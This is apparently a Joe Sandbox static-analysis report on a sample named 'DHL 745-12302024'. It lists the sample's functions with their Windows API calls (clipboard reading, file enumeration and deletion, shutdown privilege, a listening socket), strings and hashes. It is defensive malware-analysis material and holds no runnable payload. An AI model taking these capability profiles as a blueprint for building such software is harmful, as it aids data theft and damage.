OpenClipboard.USER32(00AFCC08), ref: 00ADEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00ADEB37
GetClipboardData.USER32(0000000D), ref: 00ADEB43
CloseClipboard.USER32 ref: 00ADEB4F
GlobalLock.KERNEL32(00000000), ref: 00ADEB87
CloseClipboard.USER32 ref: 00ADEB91
GlobalUnlock.KERNEL32(00000000), ref: 00ADEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00ADEBC9
GetClipboardData.USER32(00000001), ref: 00ADEBD1
GlobalLock.KERNEL32(00000000), ref: 00ADEBE2
GlobalUnlock.KERNEL32(00000000), ref: 00ADEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00ADEC38
GetClipboardData.USER32(0000000F), ref: 00ADEC44
GlobalLock.KERNEL32(00000000), ref: 00ADEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00ADEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ADEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00ADECD2
GlobalUnlock.KERNEL32(00000000), ref: 00ADECF3
CountClipboardFormats.USER32 ref: 00ADED14
CloseClipboard.USER32 ref: 00ADED59

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: f85d906ad3511797b99ca7d531ed1e9ef3cc633e97d1b5ef975a5d368968d235
Instruction ID: d1b3afc1c00e1c3b53114eb1640f24f18ea611f2f6f303e4f5b445de6393d3cd
Opcode Fuzzy Hash: f85d906ad3511797b99ca7d531ed1e9ef3cc633e97d1b5ef975a5d368968d235
Instruction Fuzzy Hash: 1061AF352042059FD300EFA5DA88F7AB7B8AF84714F14451AF4969B3A1CB31ED46CB62

Function 00AD698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00AD69BE
FindClose.KERNEL32(00000000), ref: 00AD6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AD6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00AD6A75

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00AD6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00AD6ADF

Strings

%03d, xrefs: 00AD6DA2
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00AD6B32
%4d%02d%02d%02d%02d%02d, xrefs: 00AD6B6A
%02d, xrefs: 00AD6C00, 00AD6C0A, 00AD6C5A, 00AD6CAA, 00AD6CFA, 00AD6D4A
%4d, xrefs: 00AD6BB1

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 4e8d4f57ab32460a02222419821cc4c3a658f7f2bf6e4f92a68e9ca3c6148f1f
Instruction ID: 852c73745969711b13c6fd7858c4df1a053641248b2120088e565d996e7898ff
Opcode Fuzzy Hash: 4e8d4f57ab32460a02222419821cc4c3a658f7f2bf6e4f92a68e9ca3c6148f1f
Instruction Fuzzy Hash: A4D130B1508340AFC710EBA4CA81EABB7FCAF98704F44491EF589D7291EB74DA44C762

Function 00AD9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00AD9663
GetFileAttributesW.KERNEL32(?), ref: 00AD96A1
SetFileAttributesW.KERNEL32(?,?), ref: 00AD96BB
FindNextFileW.KERNEL32(00000000,?), ref: 00AD96D3
FindClose.KERNEL32(00000000), ref: 00AD96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00AD96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD974A
SetCurrentDirectoryW.KERNEL32(00B26B7C), ref: 00AD9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD9772
FindClose.KERNEL32(00000000), ref: 00AD977F
FindClose.KERNEL32(00000000), ref: 00AD978F

Strings

*.*, xrefs: 00AD96F5

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: ddf421a541e58389caad3e20d764f0abd22076406b5e41d3b9e1adcffa0070a7
Instruction ID: c8bfc92d979844f79508f9a3a5b90e663a78ccedda32ab034dd2b8406ecabed6
Opcode Fuzzy Hash: ddf421a541e58389caad3e20d764f0abd22076406b5e41d3b9e1adcffa0070a7
Instruction Fuzzy Hash: 0831BF3294061D6ADB14EFF5ED09AEF77ACAF09320F104196F816E22A0EB34D945CB10

Function 00AD979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 00AD97BE
FindNextFileW.KERNEL32(00000000,?), ref: 00AD9819
FindClose.KERNEL32(00000000), ref: 00AD9824
FindFirstFileW.KERNEL32(*.*,?), ref: 00AD9840
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD9890
SetCurrentDirectoryW.KERNEL32(00B26B7C), ref: 00AD98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD98B8
FindClose.KERNEL32(00000000), ref: 00AD98C5
FindClose.KERNEL32(00000000), ref: 00AD98D5

Part of subcall function 00ACDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00ACDB00

Strings

*.*, xrefs: 00AD983B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 680b1db8104e7f5b9cc7a64fc17cf6731c456e0ff977463146d31cfc22cb6087
Instruction ID: 70f210777eca835a54de75cc46c57807489dff749ffe28bbf57764d2269debea
Opcode Fuzzy Hash: 680b1db8104e7f5b9cc7a64fc17cf6731c456e0ff977463146d31cfc22cb6087
Instruction Fuzzy Hash: AC31E33254061D7EDF14EFF5EC49AEF77ACAF06720F104156E815A22A0EB30D945DB60

Function 00AD8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AD8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AD8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AD8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AD8310
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8324
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AD838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00AD8395

Strings

*.*, xrefs: 00AD839B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 7aa94b93c05654d0a35b848cc02a84230be848faad902e030e4530335040c6ad
Instruction ID: 3fa025eba2fe66f912fe257bff8a6318ee0abeac9416f7d24589f65b1814fbb0
Opcode Fuzzy Hash: 7aa94b93c05654d0a35b848cc02a84230be848faad902e030e4530335040c6ad
Instruction Fuzzy Hash: 136158725043459FCB10EF64C9409AEB3F8FF89324F04891EF99A87251EB35E945CB92

Function 00ACD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A63AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A63A97,?,?,00A62E7F,?,?,?,00000000), ref: 00A63AC2

Part of subcall function 00ACE199: GetFileAttributesW.KERNEL32(?,00ACCF95), ref: 00ACE19A

FindFirstFileW.KERNEL32(?,?), ref: 00ACD122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00ACD1DD
MoveFileW.KERNEL32(?,?), ref: 00ACD1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACD20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACD237

Part of subcall function 00ACD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00ACD21C,?,?), ref: 00ACD2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00ACD253
FindClose.KERNEL32(00000000), ref: 00ACD264

Strings

\*.*, xrefs: 00ACD0CD, 00ACD0D6, 00ACD0EB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: e5ce9eee29a82c96bc0bbe4e39e3a1be91771191f934ad4739c6ab592434cc96
Instruction ID: c7699ce28102c486b76af9420c758a79f905270cdca2912717a49f2e4e69d1cc
Opcode Fuzzy Hash: e5ce9eee29a82c96bc0bbe4e39e3a1be91771191f934ad4739c6ab592434cc96
Instruction Fuzzy Hash: E0612D3180110DAACF15EBE0DB52EEEB7B9AF65300F254169E40677191EB319F0ADB61

Function 00ADED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00ADED91
EmptyClipboard.USER32 ref: 00ADED97
GlobalAlloc.KERNEL32(00000002,?), ref: 00ADEDAC
CloseClipboard.USER32 ref: 00ADEEA3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 950bfa97991d6b36ae08adc017ff24a446b3d7b49aeddf042fdd604fdd5b688c
Instruction ID: 88e32cdf24ae0db6bfbab867138414ace20ccf6a18726a9e356a3bdb90626fea
Opcode Fuzzy Hash: 950bfa97991d6b36ae08adc017ff24a446b3d7b49aeddf042fdd604fdd5b688c
Instruction Fuzzy Hash: 0A41BF35204611AFD320EF95D988B29BBE5FF44328F14C09AE4568F762CB75ED42CB90

Function 00ACE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AC170D
Part of subcall function 00AC16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AC173A
Part of subcall function 00AC16C3: GetLastError.KERNEL32 ref: 00AC174A

ExitWindowsEx.USER32(?,00000000), ref: 00ACE932

Strings

@, xrefs: 00ACE925
, xrefs: 00ACE95C
SeShutdownPrivilege, xrefs: 00ACE902
, xrefs: 00ACE920

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 78006378b297b7e91e8e4e79cf7d1b4315b21f78948cbbe1e3bb665598c7c56f
Instruction ID: df54962dcbd53f389e3b0c94e64575f3c123734ab3840ad18f6e0572bb701216
Opcode Fuzzy Hash: 78006378b297b7e91e8e4e79cf7d1b4315b21f78948cbbe1e3bb665598c7c56f
Instruction Fuzzy Hash: 64012632610214ABEB54A3F99D86FBFF26CA704750F160529F812E21D2D9B05C408290

Function 00AE1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 00AE1276
WSAGetLastError.WSOCK32 ref: 00AE1283
bind.WSOCK32(00000000,?,00000010), ref: 00AE12BA
WSAGetLastError.WSOCK32 ref: 00AE12C5
closesocket.WSOCK32(00000000), ref: 00AE12F4
listen.WSOCK32(00000000,00000005), ref: 00AE1303
WSAGetLastError.WSOCK32 ref: 00AE130D
closesocket.WSOCK32(00000000), ref: 00AE133C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: cd44bf4bed2eb14c2998f290282364f50721a2453ce4162ea4486b990f7ec98b
Instruction ID: 42e4427d4d15c7b7087c15ec110e8fcae420c3705320b6ae34efc3b04eca5c9e
Opcode Fuzzy Hash: cd44bf4bed2eb14c2998f290282364f50721a2453ce4162ea4486b990f7ec98b
Instruction Fuzzy Hash: A041B3316002519FD710DFA5C988B69BBF5BF46328F188198E9569F2D2C771EC82CBE1

Function 00A9B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9B9D4
_free.LIBCMT ref: 00A9B9F8
_free.LIBCMT ref: 00A9BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B03700), ref: 00A9BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00B3121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A9BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00B31270,000000FF,?,0000003F,00000000,?), ref: 00A9BC36
_free.LIBCMT ref: 00A9BD4B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 10dd498d53a75709ef08965262f3ed06c0de55c2e4a2ca689a3fd02c6f837b29
Instruction ID: 35a5e39a5d507a5a7b6b5e8d375eba123df5530f0c7e24c6438a7b5d5c44261b
Opcode Fuzzy Hash: 10dd498d53a75709ef08965262f3ed06c0de55c2e4a2ca689a3fd02c6f837b29
Instruction Fuzzy Hash: 9CC12671B14208AFDF20DF69AE41BAE7BF9EF45350F24459AE494DB291EB308E41C760

Function 00ACD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A63AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A63A97,?,?,00A62E7F,?,?,?,00000000), ref: 00A63AC2

Part of subcall function 00ACE199: GetFileAttributesW.KERNEL32(?,00ACCF95), ref: 00ACE19A

FindFirstFileW.KERNEL32(?,?), ref: 00ACD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 00ACD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 00ACD481
FindClose.KERNEL32(00000000), ref: 00ACD498
FindClose.KERNEL32(00000000), ref: 00ACD4A1

Strings

\*.*, xrefs: 00ACD3F2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: f52d2c1e9a64279ce7233b46f5eb3343c170414d1ef564b9e4f0e4221fe56174
Instruction ID: 618cf8c2a097cbb4b1a4cc42fb3cdfb8d8429efb46388a90ae0273615207e7af
Opcode Fuzzy Hash: f52d2c1e9a64279ce7233b46f5eb3343c170414d1ef564b9e4f0e4221fe56174
Instruction Fuzzy Hash: 303160720083459BC304EFA4DA919AFB7F8AEA1314F444A2DF5D593191EB30AA09DB63

Function 00A9E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00A9E645

Strings

1#QNAN, xrefs: 00A9F84B
1#SNAN, xrefs: 00A9F844
1#IND, xrefs: 00A9F83D
1#INF, xrefs: 00A9F852

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 7ca5f97cf274a5a8e67c6318a01d0ede093fae622bb7d6963993909cee5eabea
Instruction ID: b4765a5745aeb1c159e5be0b64f1beed66bbc2e2beb36aa79f0fd109694ca412
Opcode Fuzzy Hash: 7ca5f97cf274a5a8e67c6318a01d0ede093fae622bb7d6963993909cee5eabea
Instruction Fuzzy Hash: E3C20572E086288FDF25CF289D407AAB7F5EB48315F1541EAD84DE7241E779AE818F40

Function 00AD648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AD64DC
CoInitialize.OLE32(00000000), ref: 00AD6639
CoCreateInstance.OLE32(00AFFCF8,00000000,00000001,00AFFB68,?), ref: 00AD6650
CoUninitialize.OLE32 ref: 00AD68D4

Strings

.lnk, xrefs: 00AD64BA, 00AD6524, 00AD65E0

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 08cfbf1e46831951ec3f6a9a3cadcee509b35aaf30362ae3d3ddf3fa2e7495b3
Instruction ID: ff80b8dd43e1095395df7d3cab6e09341d9f3a53a05e458c3e2751673466adb9
Opcode Fuzzy Hash: 08cfbf1e46831951ec3f6a9a3cadcee509b35aaf30362ae3d3ddf3fa2e7495b3
Instruction Fuzzy Hash: F4D13971508301AFC304EF64C981A6BB7F8FF98704F10496DF5968B2A1EB71E945CBA2

Function 00AE22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00AE22E8

Part of subcall function 00ADE4EC: GetWindowRect.USER32(?,?), ref: 00ADE504

GetDesktopWindow.USER32 ref: 00AE2312
GetWindowRect.USER32(00000000), ref: 00AE2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00AE2355
GetCursorPos.USER32(?), ref: 00AE2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00AE23DF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 4b2a5b7c5a11f6c29b80b214483427695541361d03aca65c943c0a662c90776b
Instruction ID: d77a61569c15e88bf6cbe4e81dc28048c9c68a8efd0d030f01d63dbe35adb939
Opcode Fuzzy Hash: 4b2a5b7c5a11f6c29b80b214483427695541361d03aca65c943c0a662c90776b
Instruction Fuzzy Hash: 7831CF72504356ABC720DF96C945F6BB7AEFF84710F000919F9859B181DB34E909CB92

Function 00AD9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00AD9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AD9C8B

Part of subcall function 00AD3874: GetInputState.USER32 ref: 00AD38CB
Part of subcall function 00AD3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AD3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AD9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AD9C75

Strings

*.*, xrefs: 00AD9B5D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

